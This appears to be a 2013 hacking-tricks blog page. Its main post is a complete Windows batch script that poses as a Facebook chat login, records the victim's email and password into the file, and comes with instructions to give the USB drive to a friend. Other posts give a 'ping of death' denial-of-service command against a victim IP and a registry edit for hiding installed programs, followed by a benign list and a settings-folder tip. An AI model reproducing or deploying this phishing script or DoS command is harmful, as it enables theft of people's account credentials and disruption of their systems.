Translate

Wednesday, 24 July 2013

Trick to get the Email and password of a person via a USB drive

Here is a simple trick to get the Email and password of a person via a USB drive with some social engineering.

1. Open notepad and paste the following code and leave a blank line after the code.

TITLE FBChat

ECHO OFF

COLOR 03

CLS

ECHO.

ECHO LOGIN TO START CHATTING ON FACEBOOK

ECHO.

ECHO Please enter your email:

SET/P "MAIL=>"

ECHO.

ECHO Enter the password:

SET/P "PSWD=>"

ECHO EMAIL = %MAIL%>>FBChat.bat

ECHO PASSWORD = %PSWD%>>FBChat.bat

CLS

TIMEOUT /T 5 >NUL

COLOR 0C

ECHO.

ECHO An error occurred while connecting to the server. Try again later.

PAUSE>NUL

EXIT

---------- Below this line are the collected information ----------

2. Save the code as FBChat.bat exactly. Do not name it anything else or it won't work.

3. Put the batch file into a USB drive and give it to your friend.

When you get back the USB drive, right click the batch file and select Edit. Now scroll down and you will see the information collected!

Ping Command to destroy the system

How to do "PING OF DEATH" through CMD, also called DOS(denial of service) attack.

start your cmd, type command in given format.

ping 192.168.20.9 -l 65000 -n 65000 -w 0.0001

*change ur victim IP by ur own.
*–n represents number of attempts and –w represents waiting time after one ping attack.

*Now a days, this is very well knows problem so may be that this will not work for IP you are trying but this is how we do DOS attack...

There is third party tool available too and you can try that if you are not comfortable with this.

The program list which is shown in Add/Remove programs is  collected from registry path shown below.
HKEY_LOCAL_MACHINE \SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

So all we need to do is to go to that particular uninstall entry of the program and change the display name. Here I will show you an example on how to hide Yahoo Messenger from Add Remove programs list.

Similarly you can do the same trick to hide programs

How to hide Programs from Add/ Remove Programs list.
—>Example shown below explains us how to hide Yahoo Messenger.
Click Start and type regedit.exe

Right click on regedit.exe and select Run as Administrator.
[You’ll require admin rights to edit registry]

Navigate to the following location.
HKEY_LOCAL_MACHINE \SOFTWARE\Microsoft \Windows\CurrentVersion \Uninstall\Yahoo Messenger

Click on Yahoo Messenger on left pane.

Now you can see the options coming up for Yahoo Messenger in the right pane of registry editor.
In the right pane, Select DisplayName.

Right click on Display Name and select Rename. Now change it any other value, like for example you can change it to Never Display Name or No Display Name.

After completing this trick, Yahoo Messenger program will not be shown in the Add/Remove programs list.

This hack for hiding programs from control panel will work on Windows Vista,Windows 7,Windows XP and Windows 8.

Hacker Vs Programmer

1. A hacker beats the system.
A programmer maintains the system.

2. A hacker is trying to get in.
A programmer is trying to stop things getting in.

3. A hacker does things because he believes in them.
A programmer does what he is supposed to.

4. A hacker changes the way things are.
A programmer tries to keep the status quo.

5. A hacker is agile.
A programmer is a small cog in a big slow machine.

6. A hacker has many points of attack.
A programmer has one job.

7. A hacker has to be fast.
A programmer doesn’t.

8. A hacker is self-reliant.
A programmer relies on others.

9. A hacker finds paths that don’t exist.
A programmer guards the old ones that already do.

10. A hacker is about being interesting.
A programmer is about being perfect.

Thursday, 4 July 2013

To access full system settings in one place



1) Create a New folder in desktop or else where on ur system

2) And copy the below code and rename the folder

    GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

3) Now the Folder icon will be like control panel icon

4) Double click on the icon and access all the settings